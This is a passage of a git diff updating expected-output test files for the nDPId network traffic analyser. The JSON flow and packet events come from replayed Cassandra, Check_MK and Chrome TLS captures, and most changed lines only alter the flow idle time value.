+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStcjswQ7evbR5OKASqqr+MAAAAgT\/1wQCCAon7JNDJ+yTQwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA06nVAAEAGUkx\/AAABfwAAAbXII1K9tHk47MEO34AQAVb+KAAAAQEICifsk0Mn7JND"} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA81IRAAEAGaDV\/AAABfwAAAbXJI1KmXkfoAAAAAKACqqr+MAAAAgT\/1wQCCAon7JNsAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStckXl5aGpl5H6aASqqr+MAAAAgT\/1wQCCAon7JNsJ+yTbAEDAwc="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA01IVAAEAGaDx\/AAABfwAAAbXJI1KmXkfpF5eWh4AQAVb+KAAAAQEICifsk2wn7JNs"} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1450889498032,"flow_last_seen":1450889698077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25148,"flow_tot_l4_payload_len":78224,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} 
+00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1450889498074,"flow_last_seen":1450889698077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11446,"flow_tot_l4_payload_len":28884,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","packets-captured":286,"packets-processed":286,"total-skipped-flows":0,"total-l4-data-len":107108,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1450889698077} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 286/286 diff --git a/test/results/check_mk_new.pcap.out b/test/results/check_mk_new.pcap.out index af8087876..96ec80a61 100644 --- a/test/results/check_mk_new.pcap.out +++ b/test/results/check_mk_new.pcap.out 
@@ -1,11 +1,11 @@ 00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"check_mk_new.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1512031663734} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1512031663734,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1512031663734,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA8gwhAAEAGbgrAqGQWwKhkMuZ2GZzVcug3AAAAAKACchA4TQAAAgQFtAQCCAorDGs\/AAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"8soKyPpERjIA9qTsCABFAAA8AABAAEAG8SLAqGQywKhkFhmc5nZuqQJN1XLoOKAScSBJyAAAAgQFtAQCCAoWUVydKwxrPwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA0gwlAAEAGbhHAqGQWwKhkMuZ2GZzVcug4bqkCToAQAOVJwAAAAQEICisMaz8WUVyd"} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1512031663734,"flow_last_seen":1512031663736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1512031663736,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} -00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1512031663734,"flow_last_seen":1512031663775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4096,"flow_tot_l4_payload_len":13758,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1512031663775,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1512031663734,"flow_last_seen":1512031663734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1512031663734,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1512031663734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA8gwhAAEAGbgrAqGQWwKhkMuZ2GZzVcug3AAAAAKACchA4TQAAAgQFtAQCCAorDGs\/AAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1512031663734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1512031663734,"pkt":"8soKyPpERjIA9qTsCABFAAA8AABAAEAG8SLAqGQywKhkFhmc5nZuqQJN1XLoOKAScSBJyAAAAgQFtAQCCAoWUVydKwxrPwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1512031663734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA0gwlAAEAGbhHAqGQWwKhkMuZ2GZzVcug4bqkCToAQAOVJwAAAAQEICisMaz8WUVyd"} 
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1512031663734,"flow_last_seen":1512031663736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1512031663736,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} +00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1512031663734,"flow_last_seen":1512031663775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4096,"flow_tot_l4_payload_len":13758,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1512031663775,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","packets-captured":98,"packets-processed":98,"total-skipped-flows":0,"total-l4-data-len":13758,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1512031663775} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets 
captured/processed: 98/98 diff --git a/test/results/chrome.pcap.out b/test/results/chrome.pcap.out index e28828446..c9c0a2466 100644 --- a/test/results/chrome.pcap.out +++ b/test/results/chrome.pcap.out 
@@ -1,47 +1,47 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"chrome.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1620902507870} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902507870,"flow_last_seen":1620902507870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902507870,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620902507870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902507870,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuJAbsdWbUDAAAAALAC\/\/8TEgAAAgQFtAEDAwUBAQgKM3SSOAAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902507899,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4lEvFS6HVm1BKAS\/og8HwAAAgQFrAQCCAo6mxVSM3SSOAEDAwc="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902507899,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuJAbsdWbUERLxUu4AQECxZJAAAAQEICjN0klQ6mxVS"} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902507870,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902507899,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902507870,"flow_last_seen":1620902507935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902507935,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902508740,"flow_last_seen":1620902508740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902508740,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620902508740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902508740,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuKAbtgbcSnAAAAALAC\/\/+8\/wAAAgQFtAEDAwUBAQgKM3SVkQAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902508769,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4peZebaYG3EqKAS\/og23AAAAgQFrAQCCAo6mxi5M3SVkQEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902508769,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuKAbtgbcSoXmXm24AQECxT5gAAAQEICjN0lag6mxi5"} 
-00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902508740,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902508769,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902508740,"flow_last_seen":1620902508800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902508800,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509272,"flow_last_seen":1620902509272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509272,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620902509272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509272,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuYAbvjd2YSAAAAALAC\/\/+WlQAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509273,"flow_last_seen":1620902509273,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509273,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
